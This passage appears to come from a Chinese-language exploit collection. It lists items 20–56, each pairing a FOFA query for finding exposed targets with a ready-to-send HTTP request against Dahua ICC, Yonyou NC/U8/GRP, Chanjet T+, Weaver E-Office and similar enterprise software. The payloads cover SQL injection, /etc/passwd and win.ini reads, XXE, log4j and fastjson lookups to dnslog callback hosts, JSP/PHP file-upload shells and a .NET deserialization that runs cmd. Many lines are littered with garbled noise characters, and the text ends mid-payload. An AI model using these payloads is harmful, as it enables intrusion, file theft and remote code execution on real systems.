0 \1 e( ]" C6 E. K) q2 y! t7 W' gGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.18 {5 m# U8 @; X, c
Host:
% y* ?& V- j( h' S0 e+ O3 X! uUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 c" }4 l9 k( W4 S) P1 ?- E3 NAccept-Encoding: gzip, deflate
1 P- k0 |: A" h5 I* g+ b6 Y+ p: ~Accept: */*  n% s- k+ r+ S' ?7 x4 ]: Z, W- Y* I
Connection: keep-alive3 E2 |: E$ g6 H; Q
; ^; ?  {* Q+ ?- L$ ^

5 P! w# _9 K: H- A% P( {2 n20. 大华ICC智能物联综合管理平台任意文件读取
6 v' W% k8 D3 ^: tFOFA:body="*客户端会小于800*"
, k* G1 x$ L2 T- Y5 I# OGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
: ?9 m# ~0 U4 K4 M, Y4 sHost: x.x.x.x' y2 J9 x  a8 U. e- D
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 O' |. s% d2 Y: x" C  q/ x4 v% E# lConnection: close! h, }7 h: h/ d* J) C& q
Accept: */*$ H, l% a7 v* A4 a" B
Accept-Language: en" c3 [; X! v+ \) M* {
Accept-Encoding: gzip
/ @/ j' a' p/ N" v  Z8 i
( |( M% I: E& u% G. ?) U4 a8 R4 F
21. 大华ICC智能物联综合管理平台random远程代码执行
1 \4 K+ U" \; j; K8 R6 N: V1 tFOFA:icon_hash="-1935899595"+ [% e  b# F1 _1 I0 d3 d5 }$ b4 a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
' J# s1 W) L$ o9 [: R0 rHost: x.x.x.x; f, d/ F7 Z, d8 ^6 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( J8 x0 A5 \2 ~! F6 {
Content-Length: 161
# u5 m: p3 K' p2 O! ~  g/ t2 b) JAccept-Encoding: gzip
  i( s4 x) p8 I, K  q- rConnection: close; P/ C1 R8 O3 D% Q( _6 L/ h: s- Q
Content-Type: application/json;charset=utf-86 P0 z, }, T% o# _% m# d6 \( A# @- e9 P4 L

0 D: D& ?) ]" @3 V- v7 x{
! \% ?4 ~# j7 N, m! ^2 T; T* E" y"a":{
$ J$ I8 v/ l( W' _   "@type":"com.alibaba.fastjson.JSONObject",. _, _& F- a. d7 s: N( z
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
% s, Q' h8 D9 P  R7 A* a  }"") B5 T- \# B0 d. z
}# N9 S; Y4 x& P( Z7 ?. ~

. e! g. R, x' y0 F, |" k. X" v
! `( H. r8 ~% D  C; @8 z22. 大华ICC智能物联综合管理平台 log4j远程代码执行# P  }# l: B, Y) r2 O5 |# a& x
FOFA:icon_hash="-1935899595"4 @+ H6 J; s* b4 s% u+ }" r
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
: U- Q4 B7 V7 A/ k; U& Z; j9 S$ QHost: your-ip
2 m! v! X4 |' o1 ]6 h$ P4 R+ S; g9 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 Z( G$ n/ h3 k- P/ T8 a* EContent-Type: application/json;charset=utf-8
  V, h9 i# a* k& ~. y
8 z5 K4 U/ G) A4 \1 L{
0 ~4 I! |, t. N! d( P"loginName":"${jndi:ldap://dnslog}"8 f& j8 u& o9 ^4 o, R7 v) Y
}
0 H3 K& r& E- W% R: h) S. r
+ w/ v; s! g. O: _- T8 q6 ?0 Q% ]- }( W5 V! i! b
+ O/ Z7 l7 T" i5 a; E9 W  U( Y
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- b1 j% d. i: n1 o' F
FOFA:icon_hash="-1935899595"
! _# o) N; d, B4 s$ x( j! zPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
9 j! Z0 m" m. W# r  @Host: your-ip
! r5 D6 |* U9 @( o6 H- MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 A2 [' R6 s; Z' JContent-Type: application/json;charset=utf-8+ Q) d0 |! t' u" l4 L, V/ s
Accept-Encoding: gzip
9 U( |; G7 r6 q- E7 `/ Q2 `4 HConnection: close4 {9 o0 |/ k1 c/ W: K) G$ t
& l9 y0 `0 U+ V
{
* D  h( Z+ j/ a& N" ]    "a":{
* ~/ `- j2 o9 H/ d        "@type":"com.alibaba.fastjson.JSONObject",- m( P5 J" q1 r2 a: A
       {"@type":"java.net.URL","val":"http://DNSLOG"}
' m: Q2 v) [. q        }""# {8 B( X3 t; C+ H' H
}/ l9 U( m# [: o4 d
* Z: ^: k6 R4 J5 _3 g+ B* ]
- t$ i9 g6 {3 ?; D# e7 ^
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8
! q$ Q% N5 W- n$ o8 C' i! \( ^! L: l' w6 j9 M7 O4 `

& c" Y& h* I: F3 u28. 用友NC grouptemplet 任意文件上传
# `4 s% I) _0 v6 I; \% Y9 DFOFA:icon_hash="1085941792"
, G* d* c1 s3 p" o, I# B4 OPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1. Z# O1 i8 }8 B9 a
Host: x.x.x.x& D. z+ Q/ g. [$ f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
+ n/ p5 K/ }$ Z0 u7 e2 d4 g& fConnection: close
5 H3 j( J* m% u- |. d* F9 G5 _: A" q3 uContent-Length: 268
" S8 O( Z0 y/ j$ gContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
5 B* D1 D) u- p# AAccept-Encoding: gzip% s7 n# \& m/ i$ f9 F$ |9 S  T1 M, ]0 _

, d" i0 g1 b, J- h" |2 D------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
) s* t' m; @$ f1 V0 jContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"5 K7 o. ^& P2 d/ f3 C
Content-Type: application/octet-stream
2 |+ K: g3 [3 A7 ~0 A: }/ u
" K7 O; Y2 P6 K9 f2 E7 v* M2 g<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>9 v- W6 c' X; u3 ]: Z
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--, l  y$ L& [. g

4 P: ]( q& w  I8 d
  B/ q+ P1 n0 q+ n- P/uapim/static/pages/nc/head.jsp% N1 H: j7 h  Z& U0 H! n8 g3 P2 M

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
123
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
